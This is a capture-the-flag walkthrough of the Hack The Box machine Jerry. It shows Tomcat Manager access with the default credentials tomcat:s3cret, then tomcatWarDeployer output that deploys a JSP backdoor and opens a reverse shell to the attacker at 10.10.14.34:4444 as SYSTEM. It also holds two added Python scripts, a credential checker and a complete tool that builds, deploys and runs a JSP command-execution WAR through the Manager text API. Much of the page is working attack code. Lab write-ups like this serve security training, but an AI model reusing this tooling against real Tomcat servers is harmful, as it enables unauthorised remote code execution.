Jerry

From Luniwiki

Jerry01.png

Ports scan

root@kali:~/HTB/Machines/Jerry# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.95 --rate=1000
Starting masscan 1.0.5 at 2019-12-03 18:08:03 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 8080/tcp on 10.10.10.95

Nmap

root@kali:~/HTB/Machines/Jerry# nmap -sC -sV 10.10.10.95
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-03 13:09 EST
Nmap scan report for jerry.htb (10.10.10.95)
Host is up (0.043s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.85 seconds

Web browsing

It is an Apache Tomcat installation (version 7.0.88, as the page title reported by nmap shows), and its default landing page links to the Manager application.

Jerry02.png

If we cancel the authentication prompt, Tomcat returns a 403 error page that explains how to set up users in conf/tomcat-users.xml, and the example configuration it prints uses the username tomcat with the password s3cret.

Jerry03.png

Those example credentials work as-is, so we reach the Manager application. Tomcat ships with no Manager users at all; access here is possible only because the administrator copied the documentation example verbatim into tomcat-users.xml.

Jerry04.png
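The check above can be scripted. The following is an added example, not code from the page or from tomcatWarDeployer: it sends HTTP Basic credentials to /manager/html and classifies the answer (401 means the credentials are unknown, 403 means the user exists but lacks the manager-gui role, 200 means the Manager rendered). The candidate list and the mock Tomcat server used for the offline demo are constructed for illustration; the target 10.10.10.95:8080 is the page's.

```python
"""Check which well-known credentials the Tomcat Manager (/manager/html) accepts.

Added example for this page, not tomcatWarDeployer code. The CANDIDATES list and
the MockManager server are constructed for illustration.
"""
import base64
import sys
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# tomcat:s3cret is the pair printed in Tomcat's own 401/403 help page; the other
# pairs are constructed for this example and are not an exhaustive wordlist.
CANDIDATES = [("tomcat", "tomcat"), ("admin", "admin"), ("tomcat", "s3cret"), ("admin", "")]


def try_login(base_url, user, password, timeout=5):
    """Return the HTTP status /manager/html gives for one credential pair.

    401: unknown credentials; 403: valid user without the manager-gui role;
    200: the Manager page rendered, i.e. full access.
    """
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(base_url.rstrip("/") + "/manager/html",
                                 headers={"Authorization": "Basic " + token})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def check_manager_creds(base_url, candidates=CANDIDATES):
    """Map 'user:password' to the status each pair produced."""
    return {f"{u}:{p}": try_login(base_url, u, p) for u, p in candidates}


class MockManager(BaseHTTPRequestHandler):
    """Stand-in for Tomcat's Manager auth behaviour (constructed for the offline demo)."""
    USERS = {"tomcat": ("s3cret", {"manager-gui"}), "admin": ("admin", set())}

    def do_GET(self):
        header = self.headers.get("Authorization", "")
        user = pw = None
        if header.startswith("Basic "):
            try:
                user, _, pw = base64.b64decode(header[6:]).decode().partition(":")
            except Exception:
                pass
        if user not in self.USERS or self.USERS[user][0] != pw:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="Tomcat Manager Application"')
            self.end_headers()
        elif "manager-gui" not in self.USERS[user][1]:
            self.send_response(403)      # authenticated, but not authorised
            self.end_headers()
        else:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"<title>/manager</title>")

    def log_message(self, *args):        # keep the demo output quiet
        pass


def demo():
    """Run the check against the mock Manager on a loopback port; returns the status map."""
    server = HTTPServer(("127.0.0.1", 0), MockManager)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return check_manager_creds(f"http://127.0.0.1:{server.server_port}")
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    # usage: python tomcat_creds.py http://10.10.10.95:8080   (no argument runs the mock)
    results = check_manager_creds(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for cred, status in results.items():
        print(f"{status}  {cred}")
```

Against the mock, only tomcat:s3cret yields 200 and admin:admin yields 403, which is the distinction worth keeping in mind: a 403 tells you the password is right and only the role is missing.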

tomcatWarDeployer

We could build a WAR file with a JSP reverse shell ourselves, but Mariusz B. (mgeeky) has already automated the whole build-deploy-connect cycle in tomcatWarDeployer.

Install utility

root@kali:~/HTB/Utils# git clone https://github.com/mgeeky/tomcatWarDeployer.git
Cloning into 'tomcatWarDeployer'...
remote: Enumerating objects: 269, done.
remote: Total 269 (delta 0), reused 0 (delta 0), pack-reused 269
Receiving objects: 100% (269/269), 193.51 KiB | 1.50 MiB/s, done.
Resolving deltas: 100% (148/148), done.

Create the reverse shell

root@kali:~/HTB/Machines/Jerry# python ../../Utils/tomcatWarDeployer/tomcatWarDeployer.py 10.10.10.95:8080 -U tomcat -P s3cret -H 10.10.14.34 -p 4444 -v -u /manager/html

tomcatWarDeployer (v. 0.5.2) Apache Tomcat auto WAR deployment & launching tool Mariusz B. / MGeeky '16-18
Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.
INFO: Reverse shell will connect to: 10.10.14.34:4444.
DEBUG: Trying Creds: ["tomcat:s3cret"]: Browsing to "http://10.10.10.95:8080/manager/html"...
DEBUG: Trying to fetch: "http://10.10.10.95:8080/manager/html/"
DEBUG: Probably found something: Apache Tomcat/7.0.88
INFO: Apache Tomcat/7.0.88 Manager Application reached & validated.
INFO: At: "http://10.10.10.95:8080/manager/html/"
DEBUG: Generating JSP WAR backdoor code...
DEBUG: Preparing additional code for Reverse TCP shell
DEBUG: Generating temporary structure for jsp_app WAR at: "/tmp/tmp_sTDOH"
DEBUG: Working with Java at version: 11.0.5
DEBUG: Generating web.xml with servlet-name: "JSP Application"
DEBUG: Generating WAR file at: "/tmp/jsp_app.war"
DEBUG: added manifest
adding: files/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/web.xml(in = 505) (out= 254)(deflated 49%)
adding: files/META-INF/(in = 0) (out= 0)(stored 0%)
adding: files/META-INF/MANIFEST.MF(in = 66) (out= 65)(deflated 1%)
adding: index.jsp(in = 4494) (out= 1681)(deflated 62%)
DEBUG: Tree command not available. Skipping.
DEBUG: WAR file structure:
DEBUG:
DEBUG: Checking if app jsp_app is deployed at: http://10.10.10.95:8080/manager/html/
DEBUG: App not deployed.
INFO: It looks that the application with specified name "jsp_app" has not been deployed yet.
DEBUG: Deploying application: jsp_app from file: "/tmp/jsp_app.war"
DEBUG: Removing temporary WAR directory: "/tmp/tmp_sTDOH"
INFO: WAR DEPLOYED! Invoking it...
DEBUG: Spawned shell handling thread. Awaiting for the event...
DEBUG: Awaiting for reverse-shell handler to set-up
DEBUG: Establishing listener for incoming reverse TCP shell at 10.10.14.34:4444
DEBUG: Socket is binded to local port now, awaiting for clients...
DEBUG: Invoking application at url: "http://10.10.10.95:8080/jsp_app/"
DEBUG: Adding 'X-Pass: ijla5qmceoeM' header for shell functionality authentication.
DEBUG: Incoming client: 10.10.10.95:49193
DEBUG: Application invoked correctly.
INFO: ------------------------------------------------------------
INFO: JSP Backdoor up & running on http://10.10.10.95:8080/jsp_app/
INFO: Happy pwning. Here take that password for web shell: 'ijla5qmceoeM'
INFO: ------------------------------------------------------------
INFO: Connected with: nt authority\system@JERRY
C:\apache-tomcat-7.0.88> whoami
nt authority\system

User and root flag

C:\apache-tomcat-7.0.88> cd c:\Users\Administrator\Desktop\

c:\Users\Administrator\Desktop>
C:\apache-tomcat-7.0.88> dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of c:\Users\Administrator\Desktop

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:09 AM    <DIR>          flags
               0 File(s)              0 bytes
               3 Dir(s)  27,600,785,408 bytes free

c:\Users\Administrator\Desktop>
C:\apache-tomcat-7.0.88> cd flags
c:\Users\Administrator\Desktop\flags>
C:\apache-tomcat-7.0.88> dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of c:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,600,785,408 bytes free

C:\apache-tomcat-7.0.88> type "2 for the price of 1.txt"
user.txt
<USER_FLAG>

root.txt
<ROOT_FLAG>
c:\Users\Administrator\Desktop\flags>
C:\apache-tomcat-7.0.88> exit

Remove the war

root@kali:~/HTB/Machines/Jerry# python ../../Utils/tomcatWarDeployer/tomcatWarDeployer.py 10.10.10.95:8080 -U tomcat -P s3cret -H 10.10.14.34 -p 4444 -R -v -u /manager/html

tomcatWarDeployer (v. 0.5.2) Apache Tomcat auto WAR deployment & launching tool Mariusz B. / MGeeky '16-18
Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.
INFO: Reverse shell will connect to: 10.10.14.34:4444.
WARNING: Removing previously deployed package, any further actions will not be undertaken.
DEBUG: Trying Creds: ["tomcat:s3cret"]: Browsing to "http://10.10.10.95:8080/manager/html"...
DEBUG: Trying to fetch: "http://10.10.10.95:8080/manager/html/"
DEBUG: Probably found something: Apache Tomcat/7.0.88
INFO: Apache Tomcat/7.0.88 Manager Application reached & validated.
INFO: At: "http://10.10.10.95:8080/manager/html/"
DEBUG: Checking if app jsp_app is deployed at: http://10.10.10.95:8080/manager/html/
INFO: Removing previously deployed WAR application with name: 'jsp_app'
INFO: Succeeded. Hasta la vista!
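What the two tomcatWarDeployer runs above do (build a WAR carrying a JSP backdoor, deploy it, run commands through it, undeploy it) can be reproduced by hand against Tomcat's Manager text interface. The following is an added example, not the page's or tomcatWarDeployer's code, and it deliberately goes one step beyond the page: it uses /manager/text/deploy and /manager/text/undeploy, which require the manager-script role, whereas the tool above drives the /manager/html form, which needs manager-gui (whether the Jerry account also holds manager-script is not stated on the page). The context name /jsp_demo, the cmd parameter, the X-Pass token and the JSP body are constructed for illustration; the __TOKEN__ placeholder mirrors the X-Pass header the tool adds so that the deployed shell is not open to everyone who finds the URL.

```python
"""Build, deploy, use and undeploy a JSP command shell via Tomcat's Manager text API.

Added example for this page, not tomcatWarDeployer code. Assumptions: the account
holds the manager-script role (required by /manager/text/*); the context name,
request parameter, X-Pass token and JSP body are constructed for illustration.
"""
import base64
import io
import secrets
import sys
import urllib.error
import urllib.parse
import urllib.request
import zipfile

# The backdoor payload: refuses requests without the shared X-Pass token, otherwise
# runs ?cmd=... and echoes stdout. Deploy only where you are authorised, undeploy after.
JSP_SHELL = """<%@ page import="java.io.*" %><%
if (!"__TOKEN__".equals(request.getHeader("X-Pass"))) { response.setStatus(404); return; }
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%>"""

WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <welcome-file-list><welcome-file>index.jsp</welcome-file></welcome-file-list>
</web-app>
"""


def build_war(token):
    """Return the bytes of a WAR (a zip) holding WEB-INF/web.xml and index.jsp."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr("index.jsp", JSP_SHELL.replace("__TOKEN__", token))
    return buf.getvalue()


def war_entries(war_bytes):
    """Sorted archive members, to check the layout before deploying."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def read_member(war_bytes, name):
    """Read one member back out of the WAR (used to verify the token was embedded)."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return war.read(name).decode()


def manager_url(base_url, action, context):
    """URL of a Manager text command, e.g. .../manager/text/deploy?path=%2Fjsp_demo."""
    return f"{base_url.rstrip('/')}/manager/text/{action}?{urllib.parse.urlencode({'path': context})}"


def _request(url, user, password, data=None, method="GET", headers=None):
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    hdrs = {"Authorization": "Basic " + token, **(headers or {})}
    if data is not None:
        hdrs["Content-Type"] = "application/octet-stream"
    req = urllib.request.Request(url, data=data, headers=hdrs, method=method)
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.read().decode(errors="replace").strip()
    except urllib.error.HTTPError as err:
        return f"HTTP {err.code}"   # 401: bad creds; 403: user lacks manager-script


def deploy(base_url, user, password, context, war_bytes):
    """PUT the WAR to /manager/text/deploy; Tomcat answers 'OK - Deployed application at context path ...'."""
    return _request(manager_url(base_url, "deploy", context), user, password,
                    data=war_bytes, method="PUT")


def run_cmd(base_url, context, token, cmd):
    """Invoke the deployed JSP; no Manager auth is needed here, only the X-Pass token."""
    url = f"{base_url.rstrip('/')}{context}/?{urllib.parse.urlencode({'cmd': cmd})}"
    req = urllib.request.Request(url, headers={"X-Pass": token})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode(errors="replace").strip()


def undeploy(base_url, user, password, context):
    """GET /manager/text/undeploy?path=...; remove the backdoor once done."""
    return _request(manager_url(base_url, "undeploy", context), user, password)


if __name__ == "__main__":
    # usage: python tomcat_text_shell.py http://10.10.10.95:8080 tomcat s3cret whoami
    base, user, pw, cmd = sys.argv[1:5]
    ctx, token = "/jsp_demo", secrets.token_urlsafe(12)
    print(deploy(base, user, pw, ctx, build_war(token)))
    print(run_cmd(base, ctx, token, cmd))
    print(undeploy(base, user, pw, ctx))
```

If deploy() comes back with "HTTP 403", the credentials are right but the account only has manager-gui; in that case fall back to the HTML form, which is what tomcatWarDeployer does. Either way the shell runs with Tomcat's own privileges, and on this box the service runs as NT AUTHORITY\SYSTEM, which is why a single WAR upload ends the engagement.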

References

Daniel Simao 18:22, 3 December 2019 (EST)